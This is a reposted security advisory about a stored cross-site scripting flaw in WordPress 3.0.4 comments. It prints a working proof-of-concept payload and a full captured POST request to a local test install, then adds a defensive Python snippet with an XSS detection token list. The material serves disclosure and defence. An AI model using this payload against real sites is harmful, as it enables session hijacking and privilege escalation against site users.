WordPress 3.0.4 stored XSS vulnerability warning - MyHack58 (黑吧安全网)

2011-01-01T00:00:00
ID MYHACK58:62201128736
Type myhack58
Reporter Anonymous
Modified 2011-01-01T00:00:00

Description

WordPress is a popular blogging platform written in PHP. WordPress 3.0.4 contains a stored XSS vulnerability in its handling of comments; successful exploitation can leak session information, which may in turn lead to privilege escalation. Exploiting the vulnerability requires an account with ordinary user permissions.

[+] Info:
~~~~~~~~~
+ Title: Wordpress 3.0.4 Stored XSS (Role: Editor)
+ Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-005.txt
+ Advisory ID: 2010-005
+ Versions: Wordpress 3.0.4, 3.0.3 (maybe earlier versions)
+ Date: 30/12/2010
+ Vendor: WordPress Blog Tool and Publishing Platform
+ Impact: Execute Malicious Javascript Codes
+ CWE-ID: 79 (Cross-site Scripting)
+ Credit: Anatolia Security
+ Author: Sir - sir[at]anatoliasecurity[dot]com

[+] PoC:
~~~~~~~~~
+ Description: Attackers can execute malicious JavaScript code or hijack the SESSION for privilege escalation. The attacker has to hold the Editor role.

Screenshot: http://img3.imageshack.us/img3/1148/wordpressx.png

PoC: '"--></style></script><script>alert('XSS')</script>

POST http://localhost/wordpress304/wp-comments-post.php HTTP/1.1
Host: localhost
Connection: keep-alive
Referer: http://localhost/wordpress304/?page_id=2
Content-Length: 189
Cache-Control: max-age=0
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.3
Cookie: wp-settings-time-1=1293719651; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a9710e337f5b83061184233e85654d2c=editor%7C1293893085%7C1b3f84f58059c0fcf262ef1bb83635c2; wp-settings-time-3=1293720285

comment=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&submit=Post+Comment&comment_post_ID=2&comment_parent=0&_wp_unfiltered_html_comment=7741b495eb
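As an added example (not part of the advisory or of WordPress itself), the Python below decodes a copy of the captured POST body above, flags the context-breaking markup in the comment field, notes whether the _wp_unfiltered_html_comment field accompanied it, and shows the escaped form a defender would render instead of the raw text; the SUSPICIOUS token list and the helper names are my own.

```python
from html import escape
from urllib.parse import parse_qs

# Constructed copy of the POST body shown in the advisory above.
CAPTURED_BODY = (
    "comment=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert"
    "%28%27XSS%27%29%3C%2Fscript%3E&submit=Post+Comment&comment_post_ID=2"
    "&comment_parent=0&_wp_unfiltered_html_comment=7741b495eb"
)

# Tokens that close or open an HTML/JS/CSS context; matched case-insensitively.
SUSPICIOUS = ("<script", "</script", "</style", "javascript:", "onerror=", "onload=")


def decode_comment_post(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded comment submission into a flat dict."""
    fields = parse_qs(body, keep_blank_values=True)
    return {key: values[0] for key, values in fields.items()}


def suspicious_markup(comment: str) -> list:
    """Return the context-breaking tokens found in a comment (empty list if none)."""
    lowered = comment.lower()
    return [token for token in SUSPICIOUS if token in lowered]


def render_comment_safely(comment: str) -> str:
    """Escape comment text for an HTML text node or attribute value:
    <, >, &, " and ' are all encoded, so the text cannot close a tag or attribute."""
    return escape(comment, quote=True)


def audit_submission(body: str) -> dict:
    """Decode one submission and report what a reviewer needs to know about it."""
    fields = decode_comment_post(body)
    comment = fields.get("comment", "")
    return {
        "post_id": fields.get("comment_post_ID"),
        "unfiltered_html_field_present": "_wp_unfiltered_html_comment" in fields,
        "decoded_comment": comment,
        "findings": suspicious_markup(comment),
        "escaped": render_comment_safely(comment),
    }


if __name__ == "__main__":
    for key, value in audit_submission(CAPTURED_BODY).items():
        print(f"{key}: {value}")
```

The same audit can be run over any saved request body; a clean submission returns an empty findings list.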

[+] Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/15867